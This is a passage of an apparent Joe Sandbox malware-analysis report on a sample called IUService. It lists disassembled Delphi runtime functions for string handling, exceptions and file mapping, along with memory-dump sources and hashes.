                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,855390C3,-00000008,5000B39F,?,?,00000000,00000000,5000BF47,?,?,5000C073,?,?), ref: 5000B2A9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Move$qqrpxvpviSystem@@Unicode$Asg$qqrpvpxvAsg$qqrr20StringStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3030236992-0
                                                                                                                                            • Opcode ID: 970a367cf088cdf98191689e9a0694ce909863f07a89907442e7d6dacbf600a3
                                                                                                                                            • Instruction ID: 633908d8e5bc59ccb80292a96c5d98a609424162179242e37904b4a32d27729b
                                                                                                                                            • Opcode Fuzzy Hash: 970a367cf088cdf98191689e9a0694ce909863f07a89907442e7d6dacbf600a3
                                                                                                                                            • Instruction Fuzzy Hash: 1031E5713044858FE724FFA8DCB2B9AB392AF85304FE4876AD205CB357DA34D8528780
                                                                                                                                            Function 5000A5A8 Relevance: 13.6, APIs: 9, Instructions: 106COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A5E7
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000A6C6), ref: 5000A614
                                                                                                                                            • @System@@IntOver$qqrv.RTL120(?,00000000,5000A6C6), ref: 5000A651
                                                                                                                                            • @System@@UStrSetLength$qqrr20System@UnicodeStringi.RTL120(?,00000000,5000A6C6), ref: 5000A65B
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A67E
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A695
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120(?,00000000,5000A6C6), ref: 5000A6AB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$Unicode$AnsiFromMove$qqrpxvpviStr$qqrr20StringStringx27System@%T$us$i0$%$Internal$Length$qqrr20Over$qqrvStringi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1011950963-0
                                                                                                                                            • Opcode ID: e4b13b3abff3123872844c1e8fe38d4b4ae3526ff4051b82554457186b164d06
                                                                                                                                            • Instruction ID: 9ab0ed15de96328d0360d8f2b957ce8da5d90d071b8904a8a405cde8eb91594d
                                                                                                                                            • Opcode Fuzzy Hash: e4b13b3abff3123872844c1e8fe38d4b4ae3526ff4051b82554457186b164d06
                                                                                                                                            • Instruction Fuzzy Hash: 7A418D30A015A9DFEF10DFA8D8A099DB7F5EF46304B9542A6D500D7315DB31EE45CB80
                                                                                                                                            Function 50011278 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001137A), ref: 500112A6
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112C3
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 500112FB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5001137A), ref: 5001132C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5001137A), ref: 50011331
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001137A), ref: 5001134E
                                                                                                                                            • @Character@TCharacter@IsSurrogate$qqrb.RTL120(00000000,5001137A), ref: 50011358
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20RaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2718466752-0
                                                                                                                                            • Opcode ID: bad0fc59ee02269015429073d0d42a0ebfc6cb78c8723bc27d63799decc90d51
                                                                                                                                            • Instruction ID: 810eb6f4f35f56be61290b59cfeeda25cb95dca07b352be7eb4c63e5f55842af
                                                                                                                                            • Opcode Fuzzy Hash: bad0fc59ee02269015429073d0d42a0ebfc6cb78c8723bc27d63799decc90d51
                                                                                                                                            • Instruction Fuzzy Hash: FC315830A042899BDF15DFA4EC81AEEB7F9EF44200F5442A6E940E7655E7709E81C790
                                                                                                                                            Function 50010940 Relevance: 13.6, APIs: 9, Instructions: 91COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrLAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,50010A42), ref: 5001096E
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 5001098B
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 500109C3
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,50010A42), ref: 500109F4
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,50010A42), ref: 500109F9
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,50010A42), ref: 50010A16
                                                                                                                                            • @Character@TCharacter@IsHighSurrogate$qqrb.RTL120(00000000,50010A42), ref: 50010A20
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@Unicode$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Internal$Character@$Asg$qqrr20Except$qqrvException@$bctr$qqrp20HighRaiseRecpx14RecxiStringx20Surrogate$qqrbSysutils@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4039923113-0
                                                                                                                                            • Opcode ID: 43317869d6c1f8e73e51e660adce439b81015dec9d7cb8a377cee6d1af779c79
                                                                                                                                            • Instruction ID: 0537749609d4c2c7f5846f453ae597f4d5af8c2bbe5069fb687463282a70f4ee
                                                                                                                                            • Opcode Fuzzy Hash: 43317869d6c1f8e73e51e660adce439b81015dec9d7cb8a377cee6d1af779c79
                                                                                                                                            • Instruction Fuzzy Hash: 63316F30A002999FEF11DFA8DC915AEB7F5EF44304F9046A6E980E7252E7B09E81C791
                                                                                                                                            Function 50016B4C Relevance: 13.6, APIs: 9, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B7D
                                                                                                                                              • Part of subcall function 5001B1C8: @System@@UStrFromPCharLen$qqrr20System@UnicodeStringpci.RTL120 ref: 5001B1DB
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016B89
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A202
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BAE
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BBA
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@NewUnicodeString$qqri.RTL120 ref: 5000A227
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A23B
                                                                                                                                              • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A253
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000), ref: 5000A263
                                                                                                                                              • Part of subcall function 5000A1E4: @System@Move$qqrpxvpvi.RTL120(00000000), ref: 5000A279
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@LStrClr$qqrpv.RTL120(00000000), ref: 5000A287
                                                                                                                                              • Part of subcall function 5000A1E4: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000A297
                                                                                                                                            • @Sysutils@IntToStr$qqri.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BDF
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016BEB
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C06
                                                                                                                                              • Part of subcall function 50009EBC: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 50009EC4
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50016C32,?,?,?,?,00000000,00000000,00000000,00000000), ref: 50016C12
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Unicode$System@@$Stringx20$Asg$qqrr20Cat3$qqrr20StringStringt2$FromStr$qqriSysutils@$CharLen$qqrr20Move$qqrpxvpvi$Char$qqrr20Clr$qqrpvString$qqriStringbStringpbiStringpci
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2917779735-0
                                                                                                                                            • Opcode ID: 0163770234b153fc603f73859ed527ed7eb92f76623291e36795d766039d6016
                                                                                                                                            • Instruction ID: 76f8e76b563a54bc19a49a39c681c756d7ccbd9bc0e3cb43033c5cd06b9a2793
                                                                                                                                            • Opcode Fuzzy Hash: 0163770234b153fc603f73859ed527ed7eb92f76623291e36795d766039d6016
                                                                                                                                            • Instruction Fuzzy Hash: 2A2192707051545BE708CA9DDC659AAB3EBEFE9300F94C62BB549C3344DEB8AD118690
                                                                                                                                            Function 5002D62C Relevance: 13.6, APIs: 9, Instructions: 85COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D679
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D674
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D69C
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6A1
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5002D71E), ref: 5002D6BE
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6ED
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,00000000,5002D71E), ref: 5002D6F2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseRecxiSysutils@Unicode$Except$qqrvException@$bctr$qqrp20Recpx14$AnsiAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20FromInternalList$qqrvLoadMetaStr$qqrr20String$qqrp20Stringpx14Stringx20Stringx27System@%T$us$i0$%
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 211832472-0
                                                                                                                                            • Opcode ID: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                                                            • Instruction ID: baf3d6f3658cd3b0b0bf9b1fe87a80f42db4b7494a16350bdacbce027700de45
                                                                                                                                            • Opcode Fuzzy Hash: d82c6879fd7e8bb308ec514bab1eca5c326ff1012e43fe8cdcdfe95a8be795b9
                                                                                                                                            • Instruction Fuzzy Hash: 3E319530A05589AFEB10DFE8E995A9DB7F8EF54304F5081A7E904D7261DB709E05CB90
                                                                                                                                            Function 5001C198 Relevance: 13.6, APIs: 9, Instructions: 77fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1B9
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1BF
                                                                                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 5001C1D5
                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003), ref: 5001C1E9
                                                                                                                                            • ImageDirectoryEntryToData.IMAGEHLP(?,00000000,0000000E,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C212
                                                                                                                                            • @System@@TryFinallyExit$qqrv.RTL120(00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000,00000000,00000000,80000000), ref: 5001C21B
                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000,00000000), ref: 5001C23D
                                                                                                                                            • CloseHandle.KERNEL32(?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002,00000000), ref: 5001C246
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,5001C25C,?,00000000,5001C255,?,?,00000004,00000000,00000000,00000000,?,00000000,00000002), ref: 5001C24F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandleSystem@@View$Char$qqrx20DataDirectoryEntryExit$qqrvFinallyImageMappingStringSystem@UnicodeUnmap
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2267264102-0
                                                                                                                                            • Opcode ID: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                                                            • Instruction ID: ed93af7bb64c484572da9e927bec8c4042e6e931a3020e493e924e2f8d9bdac0
                                                                                                                                            • Opcode Fuzzy Hash: 57813ce33fd1e787f2ae7afc3594a276316039dc248eaabb460c0ce63afaddb7
                                                                                                                                            • Instruction Fuzzy Hash: C321A1B0A443C47BFB10CAE4AC56FAEB7BCAB18700F500655F704FB1C1D6B5A9408795
                                                                                                                                            Function 5002DB48 Relevance: 13.6, APIs: 9, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(?,00000000,?), ref: 5002DB70
                                                                                                                                              • Part of subcall function 500266E0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500266EA
                                                                                                                                              • Part of subcall function 500266E0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 500266FA
                                                                                                                                              • Part of subcall function 500266E0: @System@@AfterConstruction$qqrp14System@TObject.RTL120(?,500A6B50,00000000,5002A97D,00000000,5002A99F,?,00000000), ref: 50026705
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(?,00000000,?), ref: 5002DB75
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DB98
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DB9D
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBC0
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBC5
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,00000000,?), ref: 5002DBCC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,00000000,?), ref: 5002DBF1
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,00000000,?), ref: 5002DBF6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
